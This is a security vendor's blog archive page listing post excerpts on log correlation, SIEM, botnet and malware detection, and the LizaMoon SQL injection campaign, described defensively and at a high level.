Log Analysis

Log Correlation Engine Version 4 Now Available

by Dale Gardner on June 27, 2012

One of the more vexing challenges security practitioners and managers face is determining –- quickly and accurately –- which of the myriad of events, alerts, and warnings they receive on a continuous basis is most deserving of their attention. Tenable's Unified Security Monitoring (USM) solution uniquely solves that challenge by integrating active and passive vulnerability management with SIEM capabilities –- providing a contextualized and prioritized view of events and activity. USM helps users quickly focus their attention and energies on the most pressing security issues, as well as...

Enhanced Botnet Detection with Nessus

by Ron Gula on March 22, 2012

Tenable’s Research team recently added the ability for Nessus to evaluate audited hosts to see if they are connected to or configured with a known botnet IP address. In this blog entry, we will review all of the features available within Nessus for botnet and malware detection, as well as the types of features that are available in other Tenable products.

Preventing & Detecting Malware: A Multifaceted Approach

by Paul Asadoorian on April 5, 2011

Successful Attacks from Automated Malware Recently, malware dubbed "LizaMoon" (named after the first web site found distributing it) has been popping up in the news: Dubbed LizaMoon, unidentified perpetrators of the scareware campaign inject script into legitimate URLs, so when people try to access the website, they get redirected to a page warning them that their PCs are infected with malware that can be removed by downloading a free AV application called Windows Stability Center. From LizaMoon SQL Injection Attack Hits Websites LizaMoon scans web sites for easily exploitable SQL injection vulnerabilities, then uses that to put redirects on the web site that take users to a site which installs malware. This is not a new form of attack, however the "Lizamoon" malware has been surprisingly successful. Google searches for infected sites report that over 1.5 million pages have been infected. The important thing to not about the numbers of infection is "pages" does not refer to sites, as a site can have multiple infected pages. This type of attack typically works as follows:

Analyzing the Compromise - without Going Hungry

by Paul Davis on February 21, 2011

It's 4:55 PM on a Friday and you are looking forward to an enjoyable dinner with your family. Your Blackberry starts buzzing from across your desk while your inbox starts filling up with alerts from your SecurityCenter along with frantic emails from Human Resources. It seems a disgruntled employee named Jack Black quit today and nobody remembered to tell the IT group to disable his accounts until after important files started disappearing. Suddenly, you are stuck in Incident Response mode, gathering data on the user's activities. Do you cancel your reservations? Fortunately, you have deployed Tenable Network Security's Unified Security Monitoring products, and have a wide array of resources[1] at hand to streamline the response process. These resources include SecurityCenter, the Passive Vulnerability Scanner (PVS) and Log Correlation Engine (LCE). At a high level, what can these resources do for you? SecurityCenter SecurityCenter provides a unified view of both vulnerability and event data along with the alerting, ticketing and reporting required for thorough user forensics. Passive Vulnerability Scanner PVS not only tracks vulnerabilities, but logs user and network activities detected in real-time on the wire. These activities include:

Risky Business Episode 181 - Interview with Paul Asadoorian

by Paul Asadoorian on February 8, 2011

I appeared on Risky Business episode 181 for the "sponsor interview" segment of the show. I really enjoy talking to Patrick Gray - he asks great questions and we always have a great chat. This time around I discussed some topics regarding defensive measures that actually work, including: Creating listening services that "trap" web spiders Putting intelligence inside your documents to detect attackers Monitoring various services and including the results in your SEIM These topics, and more, will be the topic of my upcoming talk debuting at SOURCE Boston titled " Bringing Sexy Back: Defensive...

Putting a Virus under the SIEM Microscope Webinar

by Ron Gula on January 13, 2011

When a virus infected one of my Nessus scan targets, I did what any sensible CEO of a SIEM company would do - let it run and see what types of logs and alerts it generated! Over the 30 days that I let it run, I was able to collect a wide variety of interesting data. This included suspicious Windows application logs, internal network scans, communication anomalies, attempts to break into other lab computers and "classic" outbound connections to various IRC channels. It even modified how logins worked, breaking my Nessus patch audits. Attendees of this webinar will learn about various detection...

Log Correlation Engine 3.6 – Now with its own GUI

by Ron Gula on January 5, 2011

Tenable Network Security has released version 3.6 of the Log Correlation Engine . This new version includes many performance enhancements as well as its own web-based user interface. This blog entry describes the new user interface, the increased performance and the new features of LCE 3.6.

Risky Business #173 Interview with Ron Gula - Process Accounting and El Jefe

by Ron Gula on October 25, 2010

I was interviewed for episode # 173 of the Risky Business information security podcast. The previous Risky Business episode that discussed the recent release of the open source El Jefe project by Immunity Inc, focused on how process execution tracking for Windows can be a great source of security data - especially compared to raw network traces. During my interview with Patrick Gray, we covered how many SIEMs already have this sort of capability, but most SIEM users don't enable these features because they are complex. I also covered how Tenable's Log Correlation Engine can collect logs from...